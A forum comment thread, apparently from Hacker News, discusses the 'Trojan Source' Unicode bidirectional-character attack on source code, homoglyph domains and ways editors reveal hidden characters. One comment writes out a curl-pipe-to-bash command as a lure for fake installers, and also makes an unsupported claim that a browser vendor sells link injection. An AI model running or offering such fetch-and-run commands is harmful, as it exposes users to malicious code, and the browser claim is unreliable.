Hacker Read

Hacker Read top | best | new | newcomments | leaders | about | bookmarklet

login

		‘Trojan Source’ Bug Threatens the Security of All Code (krebsonsecurity.com) similar stories update story
		467 points by picture \| karma 23399 \| avg karma 25.71 2021-10-31 23:24:49 \| hide \| past \| favorite \| 279 comments

view as:

akersten | karma 8382 | avg karma 9.98 2021-10-31 23:52:01 | [–] similar comments

It is wrong to call this a bug, this is a feature of Unicode and very intentional. Whether we should have thought about that when allowing parsers to digest anything outside of ASCII is the real question. The answer is probably "IDEs and compilers should ignore character-direction codes when looking at source files." But that doesn't solve homoglyph attacks (and other undiscovered deception). What a fun can of worms. Who gets to solve it?

kingcharles | karma 3054 | avg karma 1.64 2021-11-01 00:25:40 | [–] similar comments

You're right - their headline is written for attention. It's an exploit of a feature.

What I'm interested to know is whether there is any code already out there in the wild with this exploit in it? An intelligence service could have exploited this years ago without anyone noticing until now.

Unicode is a pathway to all manner of hijinks, including as you say, homoglyph attacks. For instance, on some TLDs I can easily create two different domain names that render identically in the browser.

comex | karma 19146 | avg karma 4.18 2021-11-01 00:59:13 | [–] similar comments

> What I'm interested to know is whether there is any code already out there in the wild with this exploit in it?

It's possible, but I doubt it. The paper mentions that Vim isn't vulnerable to the bidirectional attack. Not mentioned in the paper: neither is `less`, the pager, which is used by default for `git diff` and other Git commands. Nor are either of the first two terminals I tried, when `cat`ing the file without a pager.

All of the aforementioned programs display the direction markers as either escape sequences highlighted in bright colors, or garbage characters, both of which stand out visually like a sore thumb. Now, that's more a sign of poor Unicode support in those programs than it is anything to their credit. But it does mean that this kind of attack is incredibly brittle, at least in any codebase where some people working on it are likely to be using Unix tools. There's a high chance the aberrant characters will be spotted at some point or other.

And once spotted, it's self-evident that it's an attack. I suspect real attacks would try to be more subtle, introducing bugs that could pass as genuine mistakes, at least at first glance.

kingcharles | karma 3054 | avg karma 1.64 2021-11-01 01:34:55 | [–] similar comments

It's sad that largescale exploitation of this is stopped only because many applications still have really poor Unicode support and would therefore make the changes human-visible.

Groxx | karma 17784 | avg karma 2.5 2021-11-01 01:42:43 | [–] similar comments

Coding editors also often show this kind of thing intentionally, as those characters are meaningful for interpretation purposes. Many of them are very UTF friendly, but they still show zero-width spaces as e.g. "<zwsp>" on purpose.

They've also often shown non-printable ASCII control characters for basically forever. Null bytes and \bel and whatnot are very important despite being "invisible", and they've been around for decades.

tetha | karma 3815 | avg karma 3.07 2021-11-01 02:36:57 | [–] similar comments

I've been bitten by things like this from an entirely unexpected angle - messengers like teams and skype sometimes <helpfully> replace characters like "-" and " " with all manner of more readable unicode characters. More readable, until the YAML parser choked.

Since that, I pretty much always run some variant of the gremlins plugin, which highlights pretty much all unicode spaces, dashes and other weird control symbols.

Groxx | karma 17784 | avg karma 2.5 2021-11-01 03:46:36 | [–] similar comments

Chat apps replacing ™ with a horrifically large, poorly-rendered and off-colored "TM" and ruining The Joke™ is a major pet peeve of mine, yeah :| And even worse, it seems to be spreading, as each one blindly copies the horrible decisions of the others. I would disable all of those auto-replacements everywhere if only I could disable all of those auto-replacements everywhere.

powersnail | karma 2517 | avg karma 3.44 2021-11-01 02:30:00 | [–] similar comments

I think making these chars human visible is a feature. Most code editors have features like showing invisible characters, displaying some representation of white space characters, or highlighting control sequences.

Because the editor is supposed to edit plain text, which means all characters must be editable. And something can only be editable if they are visible.

josephcsible | karma 22500 | avg karma 3.06 2021-11-01 01:37:47 | [–] similar comments

> Now, that's more a sign of poor Unicode support in those programs than it is anything to their credit.

But that behavior is intentional. If you want, you could do "alias less='less -r'", and then it would behave the way you want, and you'd become vulnerable to this attack.

comex | karma 19146 | avg karma 4.18 2021-11-01 01:56:13 | [–] similar comments

-r makes it pass all control characters to the terminal. To quote less's man page:

> Warning: when the -r option is used, less cannot keep track of the actual appearance of the screen (since this depends on how the screen responds to each type of control character).

This is not the same as actually supporting (i.e. being able to keep track of the screen state for) bidirectional text that may legitimately use those characters.

For that matter, the terminal may not support it either, as I mentioned.

Though, today I learned there has been some effort in recent years to improve bidirectional text handling in terminals and terminal applications, generally:

https://www.reddit.com/r/linux/comments/dn8uka/bidirectional...

KennyBlanken | karma 4695 | avg karma 1.59 2021-11-01 02:23:15 | [–] similar comments

> You're right - their headline is written for attention

That or just ignorance. Krebs has zero training or education in computer science or programming.

bmn__ | karma 1975 | avg karma 1.57 2021-11-01 03:00:41 | [–] similar comments

> I can easily create two different domain names that render identically in the browser

You can't (any more)¹. That worked for a limited amount of time, then mitigations were put in place, and subsequently standardised as part of Unicode. Everyone who deals with implementations of Unicode is supposed to be knowledgeable about the security relevant aspects, you can bet that the people working on browsers definitely are. <http://p3rl.org/perlre#Script-Runs>

¹ invitation to prove me wrong, I am on purpose leaning far out the metaphoric window and will gladly eat my words

_3u10 | karma 12688 | avg karma 16.63 2021-11-01 04:44:08 | [–] similar comments

Doesn't really matter. The major browser is intentionally security compromised, anyway.

If you pay the maker of the that browser they'll inject any links you want on most pages on the internet. Just give them the hash of the email / phone number of your target. It helps both economically and passing their security checks if you have more than a thousand victims you want to target.

If you want to fool a developer just host it on a github page. If you want to fool anyone else, just do a decent clone of their page.

If you want it to appear on most major news network sites, just pay $150 for a newswire.

Think about it, if you crafted the right article, maybe about a fork of homebrew etc, and redirected to a github page with a link stating you needed to copy and paste

curl http://github.com/asdkfjas/homebrew.sh | bash

into their terminals how many would do it?

Amorymeltzer | karma 18996 | avg karma 8.03 2021-11-01 06:13:31 | [–] similar comments

Came here to provide exactly that link (canonical: <https://perldoc.perl.org/perlre#Script-Runs>). For those who figured they'd skip over it, it's pretty neat IMO. Perl 5.28 (released 2018) added a new technique for matching patterns that aren't all from the same Unicode script, a "script run."

>In most places a single word would never be written in multiple scripts, unless it is a spoofing attack. An infamous example, is

>>paypal.com

>Those letters could all be Latin (as in the example just above), or they could be all Cyrillic (except for the dot), or they could be a mixture of the two. In the case of an internet address the .com would be in Latin, And any Cyrillic ones would cause it to be a mixture, not a script run.

kingcharles | karma 3054 | avg karma 1.64 2021-11-01 09:20:08 | [–] similar comments

> You can't (any more)¹.

That was my understanding too, until this last week when I figured out you could.

I'm pretty certain this: and this: are the same rendering, but are different Unicode, and I can register them both as domain names under some TLDs. Google displays them the same in their result pages too.

bmn__ | karma 1975 | avg karma 1.57 2021-11-01 10:14:08 | [–] similar comments

I examined closely and found both are exactly the same, a perfectly valid Latin script run and equivalent to the expression in escape notation "\N{U+74}\N{U+68}\N{U+69}\N{U+73}\N{U+3A}".

    > perl -C -E'print "\N{U+74}\N{U+68}\N{U+69}\N{U+73}\N{U+3A}"' | hex
    0000  74 68 69 73 3a                                    this:

HN software likely ate the relevant details you wanted to show, can you please try again and use a notation that survives the HN filter?

kingcharles | karma 3054 | avg karma 1.64 2021-11-01 15:30:49 | [–] similar comments

Try this: https://kingcharles.one/unistrange.html

When I created the file in Notepad it showed the hidden code, but I can register both those as valid domains and Google will show them identically in the SERPs, and Safari will show them both identically in the address bar. Chrome/Edge expands them in the address bar, but will render them the same in HTML. Have not tested on Firefox.

If you View Source in Chrome it won't show the hidden code, but if you open the dev tools it will start to break.

ximeng | karma 3422 | avg karma 3.1 2021-11-01 00:47:42 | [–] similar comments

https://github.com/rust-lang/rust/issues/28979 plenty of discussion here on Unicode including homoglyph attacks. This is for Rust but has links to Go and Zig. The Unicode standard also has extensive discussion, for example https://unicode.org/reports/tr31/ and http://unicode.org/reports/tr39/ on identifiers and security.

In general a multilayer solution is needed: compilers, linters, Unicode standard, merge tools, editors, and so on.

rurban | karma 5612 | avg karma 0.84 2021-11-01 02:49:44 | [–] similar comments

But they still don't get it right, they explicitly allow not identifiable Unicode identifiers. The C20 committee recently allowed also insecure identifiers, completely ignoring the Unicode identifier guidelines. They stated that nobody cares, everybody wants them and making them secure would need the entire Unicode database. Why do they allow noobs into such committees? What is needed are the normalization tables (tiny), the script list (tiny) and the two xid lists.

estebank | karma 4736 | avg karma 3.39 2021-11-01 12:27:48 | [–] similar comments

> they explicitly allow not identifiable Unicode identifiers. [...] They stated that nobody cares, everybody wants them and making them secure would need the entire Unicode database.

Could you elaborate? rustc ships with the entire Unicode db and only allows indents with codepoints advertised by Unicode as allowed in indents.

The closest to walking off the beaten path is a (still unmerged) parser recovery PR that accepts emojis as identifiers if and only if a parse error would otherwise occur as a way to avoid knock down errors when someone tries to use them.

rurban | karma 5612 | avg karma 0.84 2021-11-05 04:18:19 | [–] similar comments

For identifier security you don't need the entire Unicode DB. Only rust or glibc would do that, nobody else. You need the XID_Start/Continue list of bits, a single normalization table if NFC (or two if NFD), the scripts list (ranges of a single byte), and a bit of logic. With confusables I'm not sure.

That's about 2k vs 20m.

josephcsible | karma 22500 | avg karma 3.06 2021-11-01 01:31:00 | [–] similar comments

It's a feature for prose text, so programs like Word should support it. It's a security bug in anything designed to be parsed or interpreted by software, so programs like Visual Studio Code should refuse to honor it.

hollerith | karma 6663 | avg karma 1.52 2021-11-01 03:18:17 | [–] similar comments

Brilliant! Nobody would copy prose, then paste it into a code file or REPL without re-reading it after the paste.

asddubs | karma 4687 | avg karma 2.73 2021-11-01 17:04:47 | [–] similar comments

or it should be confined to the marker of the string (i.e. the quotation marks) if you're doing syntax highlighting anyway

Animats | karma 143047 | avg karma 6.11 2021-11-01 03:12:30 | [–] similar comments

What's needed is to impose on programming languages, outside of comments, checks similar to the checks made for domain names.

There is a draft standard for this.[1] It references RFC 5893 and some other documents. Some of the rules:

- All code points in a single label must be taken from the same script as determined by the Unicode Standard Annex #24: Script Names. Exceptions to this guideline are permissible for languages with established orthographies and conventions that require the commingled use of multiple scripts. (Like mixing kanji and romaji in Japanese.)

- The "Bidi rules" of RFC 5893, which define allowed right to left and left to right modes, must be enforced. These are complicated, because of such things as the Arabic and Hebrew convention of right to left text with left to right numeric digits in numbers. But they are well-defined.

- Only code points allowed by IDNA 2008 are allowed. This eliminates such things as the non-breaking zero width space, the expansion areas for future use, and such.

The domain name people have been banging on this problem since 2003, and by now, there's a rough consensus of what to disallow. So start putting checks for that in compilers. If you find violations of those rules, it's more likely to be a typo than something useful, anyway.

So that's a way out of this.

[1] https://www.icann.org/en/system/files/files/draft-idn-guidel...

varajelle | karma 886 | avg karma 2.6 2021-11-01 07:56:05 | [–] similar comments

> What's needed is to impose on programming languages, outside of comments, checks similar to the checks made for domain names.

But this attack works by placing characters inside comments and srings. So these checks would not help preventing this particular attack.

Animats | karma 143047 | avg karma 6.11 2021-11-01 13:12:05 | [–] similar comments

They say that, but don't really justify that claim. That's more about string literals that do something other than just display, such as URLs.

zeepzeep | karma 905 | avg karma 3.44 2021-11-01 03:33:34 | [–] similar comments

> "IDEs and compilers should ignore character-direction codes when looking at source files."

No I think some people would disagree, arabic coders for example. People just need to be aware of this when using unicode in their product.

samus | karma 1894 | avg karma 1.18 2021-11-01 05:05:02 | [–] similar comments

Editors and code views should definitely show when BiDi and other interesting Unicode features are used, just like they already do with spaces and zero-width whitespaces. These features should definitely work, but they are a liability if they can also used to mislead human users.

Compiler maintainers need to update the syntax rules to restrict free mixing of unicode characters. Similar restrictions were already adopted in domain names.

asddubs | karma 4687 | avg karma 2.73 2021-11-01 04:46:39 | [–] similar comments

browsers have solved it for domain names. you could apply the same heuristics for not mixing e.g. cyrillic and non cyrillic in the same word/file

Groxx | karma 17784 | avg karma 2.5 2021-10-31 23:59:11 | [–] similar comments

Ehhhh... Interesting philosophically, and we might see a practical attack maybe eventually, but most source code editors and diff reviewers that I've encountered show all non-printable characters VERY visibly. Because they matter, and always have - "func asdf()" is very different from "func as<zwsp>df()". If I saw a pile of non-printable control characters intermixed in code in a diff, there's absolutely no way I'd allow that merge.

IOCCC entries will absolutely become more fun though.

lifthrasiir | karma 12499 | avg karma 3.64 2021-11-01 00:12:29 | [–] similar comments

> IOCCC entries will absolutely become more fun though.

IOCCC doesn't allow unescaped octets with high bit set [1], so even that's no go.

[1] https://www.ioccc.org/2020/rules.txt (rule 13)

Groxx | karma 17784 | avg karma 2.5 2021-11-01 00:21:09 | [–] similar comments

Aww. But also of course they've already addressed this.

saagarjha | karma 56017 | avg karma 2.29 2021-11-01 02:18:25 | [–] similar comments

I am very curious which program abused this and forced the creation of that rule.

lifthrasiir | karma 12499 | avg karma 3.64 2021-11-01 03:06:35 | [–] similar comments

Probably 2000/briddlebane [1]. But it is more like a guard against compatibility issues.

[1] https://www.ioccc.org/2000/briddlebane.c vs. https://www.ioccc.org/2000/briddlebane.orig.c

GlitchMr | karma 1509 | avg karma 5.61 2021-11-01 03:26:45 | [–] similar comments

Well, technically the rule only talks about entries that "fail to compile". An entry that still compiles is fine, see rule 12. In practice this means the Unicode abuse like this is only allowed in strings.

lifthrasiir | karma 12499 | avg karma 3.64 2021-11-01 04:16:49 | [–] similar comments

When the rule was originally introduced in 2001 [1] it was a total ban. It seems that the rule was slightly relaxed in 2013 [2], but I think it still massively discourages any octet >= 128 because there is no portable way to set the input encoding (like GCC `-finput-charset`, which is ignored by Clang AFAIK).

[1] https://www.ioccc.org/2001/rules

[2] https://www.ioccc.org/2013/rules.txt

Jach | karma 10624 | avg karma 2.47 2021-11-01 02:33:09 | [–] similar comments

I wouldn't be so sure about visibility since it seems most code editors and programming languages want to support more unicode, not less... One of my hobbies used to be annually running a regex search through the company's millions of lines of java to see how much of an increase there was in non-printable spaces (0x200b) in java method names or other symbols. Eclipse at least wouldn't show them by default, I don't remember IntelliJ's behavior, but most people wouldn't know they were there. I was aware of only one time when it impacted someone who typed in a whole identifier by sight but the reference included a 200b and they were stuck for a bit figuring out why things didn't work.

But I agree the trick (hard to call it an attack or even bug) is fun, in the same way as the earlier tricks of fake filename extensions. And terribly obvious, even with the limitations of default code viewers, and with no plausible deniability once caught, so it's pretty overblown for practical considerations. The intentionally introduced Linux kernel bugs from several months ago were far more significant a lesson for people to learn from, and they didn't rely on any unicode tricks but on much simpler tricks that were also somewhat plausibly deniable to chalk up to an oopsie.

Groxx | karma 17784 | avg karma 2.5 2021-11-01 03:42:45 | [–] similar comments

yeah, I've had an identifier or two like that in Ruby in the past :) always worth a few facepalm-riddled lols when sharing the final result with the rest of the team, especially since it often meant they copied the func from Stack Overflow or some equivalent.

Most of what I've encountered though has been due to a lack of unicode support, and related growing pains in adopting full UTF-8. E.g. much of the Eclipse issues I saw were due to UTF-16 weirdness and stuff encoded in ShiftJIS or whatever flavor of Windows encoding you used, and all those garbled files due to missing magic-encoding-bytes in files. UTF-8 support "completing" in tools largely cleaned all that up, since they detected the encoding, converted to UTF-8, and showed abnormal stuff as the abnormalities they were all along.

I mean, that's probably because taking a deep look at supporting UTF-8 meant taking a deep look at many of their latent text bugs and finally fixing them, but it still happened around the same time, and "X editor now supports UTF-8" also marked a dramatic increase in "... and now shows <nbsp> explicitly!" and similar things.

simmo9000 | karma 53 | avg karma 1.2 2021-11-01 00:14:23 | [–] similar comments

Here is an example, open it in an appropriate editor (vi) and you can see how easy it is to 'exploit' (if you can call it that?).

https://github.com/nickboucher/trojan-source/blob/main/JavaS...

Seams like a layer 8 problem?

brundolf | karma 40865 | avg karma 9.15 2021-11-01 00:18:42 | [–] similar comments

GitHub has already updated their UI I see

Groxx | karma 17784 | avg karma 2.5 2021-11-01 00:28:16 | [–] similar comments

The Android app renders it much more suspiciously too, though unfortunately no warning: https://imgur.com/a/L3sNFQ8

techsolomon | karma 12 | avg karma 1.09 2021-11-01 01:48:44 | [–] similar comments

Changelog – https://github.blog/changelog/2021-10-31-warning-about-bidir...

Semaphor | karma 13668 | avg karma 2.69 2021-11-01 00:30:38 | [–] similar comments

In case there are people who (currently) don’t have access to such an editor, here is a screenshot: https://i.imgur.com/2Ue2Vvd.png

siddhesh | karma 43 | avg karma 2.69 2021-11-01 03:58:52 | [–] similar comments

You mean, like this?

https://imgur.com/a/unKuOoK

Snark aside, most text based editors have some giveaway or another. Even the GUI ones show syntax highlighting quirks that show that something is wrong.

This is only really relevant in unicode-aware terminals, without syntax highlighting and when you don't get to scroll between characters. IOW, it's really quite hard to do.

mmastrac | karma 45611 | avg karma 11.54 2021-11-01 00:25:22 | [–] similar comments

Fun story: I discovered these in the early 2000s and simultaneously discovered that Slashdot didn't filter these out. I spent an evening randomly reversing large sections of comment pages until they finally blocked it.

I'm very, very sorry CmdrTaco.

kingcharles | karma 3054 | avg karma 1.64 2021-11-01 00:28:04 | [–] similar comments

Most web sites' comment sections will allow these. I think even Facebook allows tomfoolery like this. f????????????¸???????????e??????????????a?`??^????????????????r?~???¯"????°???????????_???? ????°????????????????t??^??^??????h??~^?????????????????¸_????????e?¨?????? ??¯??´?¯??u?????????????????????????????t??¯?¯????"??_??????f???????????8??`?~???????¸?m?????"???????"????????????????a??????¯¨?????????n?????¨????????????

scatters | karma 1352 | avg karma 2.18 2021-11-01 03:14:49 | [–] similar comments

Well yes, Facebook has users in Vietnam. Stacked diacritics are a features, not a bug.

Cthulhu_ | karma 26640 | avg karma 2.23 2021-11-01 04:27:21 | [–] similar comments

I've seen some sites / services (Discord?) filter these out, at least to the point where they don't escape a message's vertical space. I'm sure they're truncated because those messages are pretty big in terms of amount of bytes.

And while they have valid use cases, I can't see it in e.g. comment sections or chat messages. Happy to have someone link to e.g. a Vietnamese comment section showing practical use though.

Timwi | karma 455 | avg karma 1.93 2021-11-01 06:20:48 | [–] similar comments

Vietnamese Wikipedia has plenty of Talk pages with discussion threads.

cmdrtaco | karma 1866 | avg karma 20.97 2021-11-02 10:40:45 | [–] similar comments

I’m sure you created a shitty day for one of us :( I’d like to say this was unusual, but it was pretty common.

mmastrac | karma 45611 | avg karma 11.54 2021-11-08 20:32:14 | [–] similar comments

Oof. :(

My bad, definitely sorry. A case of your favourite bubbly pop on me.

visarga | karma 12425 | avg karma 1.65 2021-11-01 00:33:27 | [–] similar comments

Why is it called a Trojan horse instead of a Greek horse?

panarky | karma 29034 | avg karma 8.55 2021-11-01 00:45:41 | [–] similar comments

Because the Greeks transferred ownership.

alanhaha | karma 22 | avg karma 0.96 2021-11-01 00:53:35 | [–] similar comments

Will this also fool formatter?

Actually I think the format of the example in https://www.trojansource.codes/ is too strange that I would like committer to fix.

kens | karma 20319 | avg karma 8.22 2021-11-01 01:17:59 | [–] similar comments

This reminds me of a trick you could do on the Commodore PET in the 1980s, where you'd embed backspaces in your BASIC code. If someone looked at the code they'd see something different from what gets executed. Effective to keep someone from copying your code in class :-)

edent | karma 28585 | avg karma 9.66 2021-11-01 01:25:19 | [–] similar comments

BDI can be used to evade profanity filters. Writing something like `‮kcuf` will display a banned word.

Does it work here?

> I am an toidi

No? HN strips the BDI.

But there are plenty of other systems which display weird RTL behavior.

lokedhs | karma 2892 | avg karma 2.22 2021-11-01 07:34:48 | [–] similar comments

Yes, Mastodon has recently been discussing this. https://github.com/mastodon/mastodon/issues/2777

josephcsible | karma 22500 | avg karma 3.06 2021-11-01 01:46:00 | [–] similar comments

Why is bidirectionality handled when text is being rendered onto the screen, instead of when it's being input from the keyboard? Why not render every single character in LTR order, and have RTL support instead be handled by text input fields moving the cursor in the opposite direction after each RTL character is typed? (I know it's too late to change this now. I'm asking why we didn't do it this way from the beginning.)

jart | karma 12123 | avg karma 5.27 2021-11-01 02:41:42 | [–] similar comments

If I understand correctly, what you're suggesting could be thought of as pre-rendering directionality into the memory layout. If we did that then it might compromise our ability to write an algorithm that iterates over a string of hebrew or arabic characters. Display is super complicated and people don't agree on how to do it. For example, consider the arabic text ???? ??? ?????. If I sneak a latin A between all those characters to prevent the display algorithm from rearranging and shaping them, then that same string looks like this: ?A?A?A?A?A?A?A?A?A?A?. Those are the same characters and you can confirm that yourself using:

    for c in '???? ??? ?????':
      print(unicodedata.name(c))

On the other hand if you want to romanize that string as EWDTA AEBW TAIH then all you need is a for loop and a switch statement, because the memory order is always left to right. We can also rest assured that if someone invents a better display algorithm, we won't need to do any database migrations, since the encoding itself doesn't need to change.

swiftcoder | karma 2276 | avg karma 2.88 2021-11-01 02:43:37 | [–] similar comments

If you have a document with mixed languages, you need to be able to edit each language in its natural direction after the fact. That requires storing directionality in the document.

And keep in mind that if you store RTL text backwards, as you propose, every algorithm now has to be able to process backwards text. Backwards spellcheck is a lot of extra work...

laurowyn | karma 125 | avg karma 1.76 2021-11-01 02:56:46 | [–] similar comments

Because visual representation is separate from the underlying data structure. A string container doesn't have a specific direction, only a relative one. I.e. This character comes before the next and after the previous. Adding the bidi control code, the string indicates when the visual ordering changes in this relative direction system.

You could absolutely design a new string container that assumes left to right at all times and cannot be changed, but then it's on the programmer to ensure that strings are copied or concatenated in the right direction, at the right location, and substrings searching becomes a minor headache. How would you concatenate an RTL string to a forced LTR string representation? You would have to work out whether the end of the string it LTR or RTL. If LTR, append directly. If RTL find the character where the direction changes and insert the string in there - much more expensive. Better to just append the string, using bidi codes where required, and let the frontend process the string to make the appropriate direction changes. Yes, you may need to search the string for the bidi code to know which direction you're going at the end of the string, but that's just a simple reverse string search for a single control character, and not a complex variable multi-byte search of inferred character directions by codepoint values.

I think the issue is in the locations of which bidi codes are rendered. They provide an inherent untrustworthy-ness to the text area they're rendered in, and so should be treated as an exception in critical situations. I've seen the reversed exe file name trick used for years, and every time I ask myself why that's even a thing? If the OS used file headers and magic numbers to determine file types instead of the filename, it would be less of an issue.

For source code, I would question the rendering of RTL text in a source code editor as it's an obvious issue for code safety. Ideally, all source code would be kept to the same origin language - doesn't have to be english, just consistent. Any non-conforming text should ideally be loaded from a resource rather than inline within the source code, to avoid foreign character contamination and allow easier identification of these issues. Further, source code rendering should only render identified safe control codes, and treat unsafe ones as raw binary values to be shown as such - i.e. \r and \n are safe, \b is unsafe, and bidi codes would also be unsafe. You could even go so far as to include them in the syntax highlighting, but that results in a dependency on syntax highlighting to show the semantics of the source code rather than the text alone.

malf | karma 212 | avg karma 2.72 2021-11-01 03:14:36 | [–] similar comments

Flip left and right in your idea, and you can try it out without learning a new language. Remember to implement word wrap.

tannhaeuser | karma 10947 | avg karma 3.1 2021-11-01 01:52:47 | [–] similar comments

That Unicode with its extremely large character set would become a solution to any and all character encoding problems in itself was never the case. Usually, for a given document you'll want to declare the subset that's actually in use such that a particular font with necessarily limited coverage can be used to render it. That's what's available for SGML markup documents eg in an SGML declaration, where you can declare and construct a document character set from planes or arbitrary code point ranges, and an SGML parser can verify actual content against that subset.

froh | karma 1600 | avg karma 1.76 2021-11-01 02:16:28 | [–] similar comments

Was that capability dropped in the transition from sgml to XML? If so, can someone here on HN provide some pointers to the old discussion?

tannhaeuser | karma 10947 | avg karma 3.1 2021-11-01 05:31:44 | [–] similar comments

All discussion related to create XML as an SGML subset can be found on the xml-dev mailing list [1], with some earlier discussions and initial drafts of the SGML ERB mostly linked from there.

The capability to declare document character sets was dropped along with supporting an SGML declaration altogether.

[1]: http://lists.xml.org/archives/xml-dev/

smsm42 | karma 17167 | avg karma 2.28 2021-11-01 03:02:52 | [–] similar comments

> Cambridge research clearly shows that most compilers can be tricked with Unicode into processing code in a different way than a reader would expect it to be processed.

Unless I misunderstand the premise, this in not right. The compiler is not "tricked" into doing anything different - it interprets the code the same way as it always did. It's like saying "rm" command "can be tricked into" deleting important files. The rm tool doesn't know which files are important to you, and the compiler doesn't - and shouldn't - know what you consider to be "correct" code. It would correctly compile any code that is syntactically correct - if there are strings inside that look weird to you, it doesn't matter to the compiler.

The entity that can be "tricked" here is the reviewer of the code - who, indeed, might probably be tricked into accepting code that does something different than they'd think it does (though it'd require a very clever attacker to for the code to both do something nefarious with Unicode and still look innocent and not weird to the reviewer). Fortunately, this is quite easy to fix - just don't accept any patches with source code that have any non-ASCII outside small set of localization resources (proper code would have localizable resources outside the code anyway, tbh) and no Unicode would ever trick you.

__alexs | karma 2585 | avg karma 3.13 2021-11-01 03:42:58 | [–] similar comments

> Fortunately, this is quite easy to fix - just don't accept any patches with source code that have any non-ASCII outside small set of localization resources

There are plenty of projects out there written by people who aren't English speakers who depend on the Unicode capabilities of languages to write code that is actually readable to them. Turning that off is far from a solution.

ivanhoe | karma 4341 | avg karma 2.79 2021-11-01 04:11:17 | [–] similar comments

Does anyone actually do that in a production code?

I myself am not native English speaker and use unicode when writing in my mother tongue, but in 20+ years of programming I've never seen anyone using non-ascii chars in their professionally written code? Of course, you use the language in localization files, and perhaps in comments occasionally - especially in TODO stuff that's not meant to be permanent - but not in the actual code, like e.g. for a variable or function names.

I'd actually consider it a bad idea, as it limits significantly who can manage that code in the future.

Cthulhu_ | karma 26640 | avg karma 2.23 2021-11-01 04:25:27 | [–] similar comments

It's a very western / Anglosphere attitude, and I think you underestimate how much code is produced in e.g. China and Japan nowadays, with comments in their native language.

How would you name a FooBarWicket if you don't speak a word of English?

I mean don't get me wrong, ideally everybody writes code in perfect English and sticks to a set of ~50 ascii characters, but it's not an ideal world and you have to keep other languages and cultures in mind.

amenod | karma 1544 | avg karma 2.66 2021-11-01 04:36:13 | [–] similar comments

I would argue that even if you decide that you are using some other language and not English, there is only a well-defined subset of Unicode characters that should ever be allowed in the codebase. Bidi override control characters are clearly not among them, whichever language you choose.

rbanffy | karma 158565 | avg karma 2.97 2021-11-01 06:45:07 | [–] similar comments

> Bidi override control characters are clearly not among them, whichever language you choose.

Not sure how would you write a comment in an RTL human language in the middle of LTR code without it. Lots of people write learn RTL languages well before writing any code.

What compilers can do is to process those characters and assign them semantic value that makes the code equivalent to what is expected to be rendered.

Now, bidi overrides in identifier names is a nightmare I’d prefer to avoid.

amenod | karma 1544 | avg karma 2.66 2021-11-01 09:55:01 | [–] similar comments

The same way as you write a comment in a LTR human language in the middle of RTL code - you don't. You stick to either LTR or RTL. This is code, not prose.

rbanffy | karma 158565 | avg karma 2.97 2021-11-02 07:19:52 | [–] similar comments

Code is meant to be read and, occasionally, executed. Comments are usually ignored by compilers and are targeted towards humans.

jrochkind1 | karma 26717 | avg karma 3.67 2021-11-01 12:49:14 | [–] similar comments

You do not actually need the bidi override control character to put a comment in an RTL language in the middle of LTR code.

You only need it if you are doing this, and the default Unicode algorithm for guessing LTR/RTL boundaries gets it wrong, so you need to override with an explicit bidi override control. I'm not even sure how feasible that is to do in current editor/IDE environments developers who have this use case might use.

I am genuinely curious how often these sorts of situations come up in actual development.

> What compilers can do is to process those characters and assign them semantic value that makes the code equivalent to what is expected to be rendered.

I don't understand what you mean or how that's even possible, for the kinds of attacks discussed in OP.

jrochkind1 | karma 26717 | avg karma 3.67 2021-11-01 17:07:15 | [–] similar comments

Btw here's proof. Here is ltr text and rtl ??????? text ???? interspersed with no bidi override control characters to be found.

Unicode can handle this, it has a heuristic algorithm for it. Note how if you try to select the text character-by-character, your selection does funny things at the rtl to ltr boundaries, because the byte order doesn't match the order on the screen. It really is handling the directionality changes, with the letters entered in "order" across changes, there is no funny entry or ordering going on, this is plain old normal unicode handling interspersed directionality changes just fine, with no bidi overrides.

It just sometimes gets it wrong for the intent of the author. Especially when there are characters at the boundaries that are themselves not strongly associated as rtl or ltr (like ordinary "western arabic numerals" or punctuation). That's what the bidi override control char is for.

WalterBright | karma 71923 | avg karma 2.96 2021-11-01 14:45:45 | [–] similar comments

> Not sure how would you write a comment in an RTL human language

Siht ekil.

chmod775 | karma 11930 | avg karma 4.66 2021-11-01 06:58:56 | [–] similar comments

> there is only a well-defined subset of Unicode characters that should ever be allowed in the codebase

It's not even remotely well-defined, and probably never will be. Also, as long as we keep adding to unicode, you will need to keep your whitelist of code points updated.

You can however find a well-defined subset of characters that can be allowed.

In either case you'd be essentially excluding entire languages.

amenod | karma 1544 | avg karma 2.66 2021-11-01 09:50:23 | [–] similar comments

You misunderstood my point:

>> There is only ... that should ever be allowed...

What I am saying is someone decides to code in a non-english language (which is completely reasonable) they should define a subset of unicode characters that is acceptable. Additionally, the allowed characters should not permit tricks like these.

As for excluding entire languages... well, yes. This is already the case today. But OTOH it's not like understanding what "if" means gives you any special advantage in programming.

worrycue | karma 1377 | avg karma 2.01 2021-11-01 04:47:29 | [–] similar comments

I still wonder though, just how much production non-comment source code is not written in the ASCII character set.

The libraries of most programming languages (developed in the west) are in ASCII - frameworks and middleware too. Have people in countries like Japan and China actually translated all of that code - renaming functions, classes, and variable names to their native tongue in Unicode - or do they just learn the English names (they are all nouns/pronouns and at most simple phrases so translation should not be too difficult; they don’t have to understand English grammar).

Moru | karma 3002 | avg karma 1.74 2021-11-01 05:27:03 | [–] similar comments

Microsoft translated all the commands in the scripting language for excell to native language, making it totally impossible to use for anyone. You can't even google it because the help is so split up in different languages.

Zababa | karma 5670 | avg karma 1.79 2021-11-01 07:21:53 | [–] similar comments

Not only the commands, the separator too. In some languages, it's FUNCTION(arg1, arg2), in some others it's FONCTION(arg1; arg2)

Moru | karma 3002 | avg karma 1.74 2021-11-03 07:28:23 | [–] similar comments

Ah yes, Swedish was one of those languages I think. I can't imagine a worse thing to do with a programming language...

ivanhoe | karma 4341 | avg karma 2.79 2021-11-01 05:03:06 | [–] similar comments

Well, what you call an Anglosphere attitude is a reality of learning in a majority of non-english speaking countries: There's simply not enough resources for learning in your own language.

China is huge so I can see how it could work for them, but I still have to admit it's very hard for me to imagine someone becoming say a competent web dev without picking at least some basic English along the way, so they can handle at least the documentation and stay in a loop on new tech coming out all the time. It's not anything new as a concept, nor I see it as damaging for local cultures in any way - back in my University days I've learned myself some Russian so that I could read their physics and chemistry books which were excellent and way cheaper and easier for me to get than those from the West. One day I'll have no problem learning some Chinese if (or more likely when?) they become the referent source of knowledge.

__alexs | karma 2585 | avg karma 3.13 2021-11-01 11:41:38 | [–] similar comments

> China is huge so I can see how it could work for them, but I still have to admit it's very hard for me to imagine someone becoming say a competent web dev without picking at least some basic English along the way,

Having worked with some large software teams in China my experience was that most people could speak a bit of English (but generally didn't want to) and were nowhere near at the level needed to actually design and write software in English.

